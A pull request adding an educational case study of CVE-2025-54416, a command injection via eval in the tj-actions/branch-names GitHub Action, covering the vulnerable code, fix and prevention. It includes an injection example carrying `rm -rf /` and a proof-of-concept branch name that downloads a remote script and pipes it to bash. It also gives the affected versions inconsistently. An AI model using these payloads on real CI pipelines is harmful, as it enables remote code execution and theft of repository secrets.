### PR TITLE
New Case study added: CVE-2025-54416

### DIFF
--- a/c/secure-coding-case-study-cwe-77-cve-2025-54416.md
+++ b/c/secure-coding-case-study-cwe-77-cve-2025-54416.md
@@ -1,0 +1,255 @@
+# CASE STUDY: Command Injection in GitHub Actions CI/CD Pipelines
+
+Continuous Integration and Continuous Deployment (CI/CD) pipelines have evolved into the backbone of modern software engineering, facilitating the rapid transition from source code to production-ready artifacts. However, this architectural centrality has simultaneously positioned CI/CD environments as high-value targets for supply chain attacks. The vulnerability identified as CVE-2025-54416 in the tj-actions/branch-names GitHub Action demonstrates a critical failure in the handling of untrusted input within these automated environments. This case study examines command injection flaws that enabled arbitrary code execution via malicious Git branch names. It explores shell scripting nuances and GitHub Actions runner architecture, detailing the exploited vulnerabilities, the eventual fix, and preventive strategies.
+
+## Software
+
+The subject of this case study is tj-actions/branch-names, a popular and widely utilized GitHub Action maintained by the tj-actions organization. This action serves as a utility for developers to retrieve current branch or tag names across a variety of GitHub events, including pushes, pull requests, and releases.
+
+- **Software Names:** tj-actions/branch-names
+- **Repository URL:** https://github.com/tj-actions/branch-names
+- **Language:** Shell (Bash / POSIX Shell), YAML
+- **Software Type:** GitHub Actions (Composite)
+- **Vulnerability Class:** Command Injection (CWE-77)
+
+
+## Weakness
+
+The main issue we're looking at is CWE-77 (Improper Neutralization of Special Elements used in a Command ('Command Injection')), which is basically what happens when a program doesn't properly clean up special characters before sending them to a command-line tool. In this case, it involved the Unix shell. When a script just takes data from an untrusted source and plugs it directly into a command, it leaves a door open for that data to be mistaken for actual code that the system then tries to run.
+
+### The Mechanics of Command Injection in Shell Environments
+
+In shell-based environments, command injection occurs due to the fundamental ambiguity between code and data. A shell script typically consists of command templates into which variable data is inserted. If the data contains metacharacters that the shell uses to control execution flow—such as semicolons (;), pipe symbols (|), ampersands (&), or command substitution sequences ($())—the shell may execute the injected logic rather than treating it as a literal string.
+
+| Metacharacter | Shell Interpretation | Injection Risk |
+|---|---|---|
+| `;` | Command separator | Executes subsequent commands |
+| `\|` | Pipe | Pipes output to next command |
+| `$(...)` | Command substitution | Executes the contents and returns output |
+| `` `...` `` | Backticks | Legacy command substitution |
+| `&& / \|\|` | Logical operators | Conditional command execution |
+| `${IFS}` | Internal Field Separator | Often used to bypass space filters |
+
+### Generic Insecure Pattern Analysis
+
+To give you an idea of how this weakness works, here is an example involving a script that tries to log a branch name provided as a command-line argument:
+
+```bash
+BRANCH_NAME=$1
+eval "echo 'Processing branch: $BRANCH_NAME'"
+```
+
+If the $BRANCH_NAME variable is something harmless like main, the shell just runs echo 'Processing branch: main'. But if someone messes with the variable to contain `main'; rm -rf /; echo '`, the string passed to eval becomes: `echo 'Processing branch: main'; rm -rf /; echo ''`. The shell reads that semicolon (;) as a command stop, and then executes the next command. This is a very critical flaw in CI/CD environments because the 'user' providing the input is often an external contributor opening a pull request, and the 'privileges' they get access to include things like repository secrets and deployment credentials.
+
+
+# Vulnerability
+
+**CVE-2025-54416 Published 25 July 2025**
+
+A severe vulnerability of command injection was found in tj-actions/branch-names (versions prior to 8.2.1) of GitHub Actions. The problem occurs due to the dangerous way tj-actions/branch-names handles user input for repository information. tj-actions/branch-names is a compound GitHub Action; it uses shell commands on a runner to fetch Git references from the repository and then passes these references onto the environment via $GITHUB_OUTPUT.
+
+An attacker may create a maliciously named Git reference (i.e., a branch name or tag) that contains a hidden shell command. In the event that the action processes such a malicious reference while using a previous version of tj-actions/branch-names, it does not correctly enforce the safe separation between static string values and dynamic, executable commands, thereby creating a CVSS severity rating of 9.1. It was possible to exploit this flaw, since the developers did not consistently sanitize all input strings prior to evaluating their content using the extremely risky function eval. Although the initial intent of the developers was to remove all special characters from input strings in order to make them "safe" by escaping them, they ultimately evaluated these escaped characters using eval.
+
+As a result, the first pass at sanitizing input strings was undone and the subsequent evaluation caused the operating system's shell to parse the original string again, allowing any embedded meta-characters to act as unauthorized command substitution and therefore granting the attacker arbitrary code execution privileges which allow the attacker complete control over the workflow runner and possibly also grant them additional entry points into the overall software supply chain.
+
+
+### Line-by-Line Analysis of the Vulnerable Script
+
+The vulnerability is located in the action.yml file in the tj-actions/branch-names repository. This file is responsible for formatting and exporting the branch names to the GitHub Actions output stream. The vulnerability existed in version 8.2.1 and the patch was implemented in version 9.0.0. The following code snippet demonstrates the unsafe pattern in the version 8.2.1 and earlier.
+
+```diff
+# Vulnerable file : tj-actions/branch-names/action.yml
+
+-79  echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
+-80  echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT"
+-81  echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"
+```
+
+The analysis of this logic reveals a multifaceted failure in the separation of data and code:
+
+1. **Variable Expansion:** The environmental variables $BASE_REF, $HEAD_REF, and $REF_BRANCH are populated with data retrieved from the GitHub event (e.g. github.event.pull_request.base.ref). The data filling these variables could be done by anyone who created a branch or initiated the pull request, such that any outside user had control over the text which made it untrustworthy.
+2. **The Role of printf "%s":** The command printf "%s" "$BASE_REF" is intended to print the variable as a strict plain, literal string. Doing this prevents the shell from accidentally running any hidden commands.
+3. **The Fatal Flaw: eval:** The use of eval instructs the shell to take the string and forces the shell to read the text a second time as shell code. Developers added this step to unescape values that may have been safely quoted earlier in the process, but it eventually opens a second window for interpretation.
+4. **The Injection Sink:** As eval re-evaluates the string, any shell string or metacharacters within $BASE_REF that were hidden inside the branch become active. For example, if $BASE_REF contains $(whoami), the shell first expands it inside the printf argument and then eval sees the string $(whoami) and executes it as a command substitution.
+
+The developers likely utilized eval to handle edge cases involving whitespace or special characters that might be present in legitimate branch names, which essentially attempts to use the shell's own parser to "clean" the input. However, such an unsafe usage of the eval command reintroduces the very risks that sanitization is meant to prevent.
+
+# Exploit
+
+The exploitation of CVE-2025-54416 is categorized under CAPEC-248: Command Injection. The flaw in the branch-names action creates a massive security hole because it processes untrusted Git data in a fundamentally unsafe way. If someone sneaks standard Bash commands into a carefully named branch, the script's use of the eval tool accidentally runs that hidden payload right on the system. This gives an outside attacker full control over the CI/CD pipeline, letting them steal secrets or mess with builds without even needing direct write access to the project.
+
+### Proof-of-Concept (PoC) Breakdown:
+
+The most common PoC for this vulnerability involves creating a branch with a name that uses command substitution to execute an external script. The steps include:
+
+1. Create a branch with the name `$(curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)`.
+2. Trigger the vulnerable workflow by opening a pull request into the target repository.
+3. Observe arbitrary code execution in the workflow logs.
+
+Example output:
+
+```bash
+Running on a pull request branch.
+Run echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
+  echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
+  shell: /usr/bin/bash -e {0}
+Running on pr: === PoC script executed successfully ===
+Runner user: runner
+```
+
+This example demonstrates how an attacker can effortlessly achieve a total system takeover by tricking the runner into downloading and running a remote script. Now, as Git strictly forbids spaces in branch names, the attacker here cleverly used commas and special shell variables to build a command which could be downloaded and hidden inside standard Bash brackets. As soon as the vulnerable action attempts to read this deceptively named branch, the workflow logs will immediately reveal the hidden payload executing under the privileged runner account. This validates that the external code was successfully fetched and run, which has entirely bypassed the standard security checks.
+
+# Fix
+
+The vulnerability was addressed in version 9.0.0 of the tj-actions/branch-names action. The remediation strategy involved removing the unsafe eval pattern and adopting a direct redirection method that treats variable data as a literal string.
+
+### Code Comparison: Before and After
+
+The following diff illustrates the fundamental change in how the action generates its outputs:
+
+
+```diff
+#Changes made to the actual file action.yml
+
+@@ -64,7 +64,7 @@ runs:
+64        HEAD_REF=${HEAD_REF/refs\/heads\//}
+65        REF_BRANCH=${REF/refs\/pull\//}
+66        REF_BRANCH=${REF_BRANCH/refs\/heads\//}
+
+           # Strip branch prefix if provided
+67        REF_BRANCH=${REF_BRANCH/$INPUTS_STRIP_BRANCH_PREFIX/}
+68        HEAD_REF=${HEAD_REF/$INPUTS_STRIP_BRANCH_PREFIX/}
+@@ -76,19 +76,18 @@ runs:
+75          REF_BRANCH=${REF_BRANCH//\//-}
+76        fi
+
+-79        echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
+-80        echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT"
+-81        echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"
++ 79        printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
++ 80        printf "head_ref_branch=%s\n" "$HEAD_REF" >> "$GITHUB_OUTPUT"
++ 81        printf "ref_branch=%s\n" "$REF_BRANCH" >> "$GITHUB_OUTPUT"
+82      else
+83        BASE_REF=$(printf "%q" "$GITHUB_EVENT_BASE_REF")
+84        BASE_REF=${BASE_REF/refs\/heads\/$INPUTS_STRIP_TAG_PREFIX/}
+
+           # Replace slashes with hyphens if enabled
+88        if [[ "$INPUTS_REPLACE_SLASHES" == "true" ]]; then
+89          BASE_REF=${BASE_REF//\//-}
+90        fi
+-91 echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
++91      printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
+92      fi
+93    shell: bash
+94  - id: current_branch
+@@ -141,7 +140,7 @@ runs:
+140          TAG=${TAG//\//-}
+141        fi
+142
+
+-143        echo "tag=$(eval printf "%s" "$TAG")" >> "$GITHUB_OUTPUT"
++143        printf "tag=%s\n" "$TAG" >> "$GITHUB_OUTPUT"
+144       echo "is_tag=true" >> "$GITHUB_OUTPUT"
+145      else
+146        echo "is_tag=false" >> "$GITHUB_OUTPUT"
+```
+
+The fix centered on the complete removal of the `eval` command from lines 79–81, 91, and 144. The original code used constructs like `eval printf "%s" "$BASE_REF"`, where `eval` forced the shell to re-parse the output of `printf` a second time — this is what turned special characters embedded in a branch name into executable commands. The remediated code drops `eval` entirely, using bare `printf` calls such as `printf "base_ref_branch=%s\n" "$BASE_REF"`. Without `eval`, the shell expands the variable only once and treats the branch name as a literal string rather than something to be interpreted. Metacharacters like `$()` or backticks are written to `$GITHUB_OUTPUT` as harmless text, never executed. This enforces the core secure coding principle of parameterization — keeping data and code strictly separate.
+
+# Prevention
+
+CVE-2025-54416 is the outcome of multiple failures in maintaining secure coding practices and designing CI/CD pipelines at tj-actions where techniques like command injection were used. There are several methods available which would have prevented this vulnerability systematically, either from being introduced or exploited. Here are some prevention techniques which ultimately focus on specific actionable practices.
+
+### 1. Pass untrusted data through environment variables and not through inline string interpolation.
+
+GitHub Actions mostly uses the `${{ }}` expression syntax to inject values directly inside the run shell blocks. During this process, GitHub performs a literal substitution before invocation of the shell, due to which the injected value becomes part of the shell script source code instead of data. To avoid this, assign the untrusted value to an environment variable inside the env block and reference the variable inside the shell. This allows the shell to expand environment variables as a single string, avoiding metacharacter interpretation entirely.
+
+**Insecure Pattern:**
+
+```yaml
+- name: Log Branch
+ run: echo "Processing ${{ steps.branch-names.outputs.current_branch }}"
+```
+
+**Secure Pattern:**
+
+```yaml
+- name: Log Branch
+ env:
+   BRANCH: ${{ steps.branch-names.outputs.current_branch }}
+ run: echo "Processing $BRANCH"
+```
+
+As shown in the example above, the shell treats $BRANCH as an environment variable. Due to this, the shell will treat the variable as a single string and will not perform command substitution on it, which ultimately neutralizes the injected metacharacters.
+
+### 2. Avoid using eval on unstructured data; instead, use direct parameterization:
+
+Here, one of the major causes of CVE-2025-54416 was the use of eval in processing variables from the user-controlled Git references. eval is responsible for forcing the shell into a second round of string parsing, where any metacharacters left from the first parsing will get executed as a command. To fix this, we can use printf `"%s"`, which expands the variables exactly once and avoids the second parsing repetition. Any shell script or CI/CD workflow making use of external data processing should make use of this pattern strictly.
+
+The following example shows the vulnerable line, where the attacker can run any kind of `$(curl,...)` command inside the `$BASE_REF` and eval treats it as a command to be executed, running it in the second parsing:
+
+```bash
+echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
+```
+
+After removing eval and rewriting it as follows:
+
+```bash
+printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
+```
+
+Here, it is clear that `$(curl,...)` is present in `$BASE_REF`, but since there is no eval, the shell treats the curl command hidden inside $BASE_REF as plain text and writes it to the output file as-is.
+
+### 3. Using static analysis tools like actionlint to detect taint flow
+
+Taint flow analysis is a technique of tracking data from an untrusted source, such as a pull request, through the program's execution. Tools like actionlint are responsible for performing static analysis on GitHub Actions YAML files and flagging unsafe interpolation patterns at runtime, whereas tools like CodeQL can perform deeper inter-procedural dataflow analysis and identify paths where an untrusted input can reach a dangerous execution point. Integrating such tools into CI/CD pipelines as a mandatory checkpoint on each pull request can help catch vulnerabilities before they reach production.
+
+### 4. Setting up a strict allow list to validate and sanitize Git reference names
+
+Git branch and tag names allow a wide variety of characters by default, including some metacharacters. So before adding any Git reference name in a shell command, it should be validated using a strict allow list and patterns. For example, if we set the allow list to alphanumeric characters, hyphens, forward slashes, and underscores, any input failing this check will be rejected completely. This eliminates the attack at the point of entry.
+
+### 5. Apply the principle of least privilege to workflow tokens and permissions
+
+In GitHub Actions, by default the GITHUB_TOKEN carries a large number of permissions, such as the ability to read secrets, write to repositories, and interact with packages. Minimum permissions should be explicitly declared in workflows using the permissions key, and for workflows that only need to read the branch name, permissions should be set to contents: read as shown below.
+
+```yaml
+permissions:
+  contents: read
+  pull-requests: read
+```
+
+This does not prevent code execution, but it drastically limits an attacker who is on a least-privilege runner trying to exfiltrate secrets, because they do not have permission to access secrets, push malicious commits, or tamper with artifacts.
+
+### 6. Use runtime observability tools like StepSecurity Harden-Runner to monitor and block suspicious activity during workflow execution
+
+Runtime observability tools can provide an extra layer of defense by monitoring what actually happens while the workflow is being executed. Tools like StepSecurity Harden-Runner can act as an endpoint detection and response agent directly on the GitHub Actions runner. These tools use eBPF technology, a kernel-level monitoring technology, using which the Harden-Runner is able to track things like every outbound network call, DNS resolution, files written during a running workflow, and many more.
+
+# Conclusion
+
+The command injection vulnerability in tj-actions/branch-names serves as a critical case study in the persistence of classic exploitation techniques within modern cloud-native infrastructure. Despite the presence of internal sanitization routines, the use of a single dangerous primitive—eval—negated all protective measures, allowing an attacker to transform a simple Git branch name into a weaponized payload. This incident highlights that in the context of CI/CD, there is no such thing as "harmless" metadata; every user-controlled field is a potential entry point for an adversary.
+
+For developers, the lesson is clear: input validation must be absolute, and code must always be strictly separated from data through the use of environment variables and parameterized commands. For security teams, the case study reinforces the necessity of defense-in-depth. By assuming that a single action may be vulnerable or compromised, organizations must implement architectural guardrails—such as least-privilege token permissions, OIDC-based identity, and SHA-pinning—to ensure that a command injection exploit remains a localized failure rather than a catastrophic supply chain breach. As the automation of software delivery continues to accelerate, the principles of secure coding must be applied not just to the applications we build, but to the very pipelines that deliver them.
+
+# References
+
+- [GitHub Actions Security Guide](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions)
+- [How to Secure GitHub Actions Workflows](https://github.blog/security/application-security/how-to-secure-your-github-actions-workflows-with-codeql)
+- [Related Vulnerability: GHSA-mcph-m25j-8j63](https://github.com/advisories/GHSA-mcph-m25j-8j63)
+- [Template Injection Advisory: GHSA-8v8w-v8xg-79rf](https://github.com/advisories/GHSA-8v8w-v8xg-79rf)
+
+- [Command Injection Vulnerability: GHSA-gq52-6phf-x2r6](https://github.com/advisories/GHSA-gq52-6phf-x2r6)
+- [tj-actions/branch-names@e497ceb](https://github.com/tj-actions/branch-names/commit/e497ceb)
+- [tj-actions/branch-names v9.0.0 Release](https://github.com/tj-actions/branch-names/releases/tag/v9.0.0)
+- [GitHub Actions: Untrusted Input](https://securitylab.github.com/resources/github-actions-untrusted-input)
+- [CVE-2025-54416 Detail](https://nvd.nist.gov/vuln/detail/CVE-2025-54416)
+- [CWE-77: Command Injection](https://cwe.mitre.org/data/definitions/77.html)
+
+# Contributions
+
+### Group Members:
+- [Rahul Deshmukh](https://github.com/Rahul-1611) - G01521128
+- [Yash Dayma](https://github.com/yashdayma55) - G01523376
+- [Chaitanya Chaudhari](https://github.com/chaitanya980) - G01512603
+
+### License
+This work is licensed under a [Creative Commons Attribution 4.0 International License](https://creativecommons.org/licenses/by/4.0/).


### PR DESCRIPTION
# Case Study: Command Injection in GitHub Actions CI/CD Pipelines

This pull request adds a secure coding case study for **[CVE-2025-54416](https://nvd.nist.gov/vuln/detail/CVE-2025-54416)**, a command injection vulnerability in the tj-actions/branch-names GitHub Action (versions prior to 9.0.0).

**[CVE-2025-54416](https://nvd.nist.gov/vuln/detail/CVE-2025-54416)** allows attackers to achieve arbitrary code execution on GitHub Actions workflow runners by crafting a malicious Git branch name containing shell metacharacters, which are unsafely evaluated via the `eval` command during output formatting.

The case study follows the MITRE Secure Coding Case Studies style guide and includes:

- Overview of the vulnerability and its real-world impact on CI/CD supply chain security
- Explanation of CWE-77 (Command Injection)
- Root cause analysis of unsafe `eval` usage in shell scripts
- Vulnerable and secure code comparison with annotated diff
- Proof-of-concept exploit scenario demonstrating arbitrary code execution
- Explanation of the patch introduced in v9.0.0
- Prevention techniques and secure coding best practices

This vulnerability demonstrates how a single dangerous shell primitive can negate all sanitization efforts and expose CI/CD pipelines to full supply chain compromise.

### Contributors

- Rahul Deshmukh (G01521128)
- Yash Dayma (G01523376)
- Chaitanya Chaudhari (G01512603)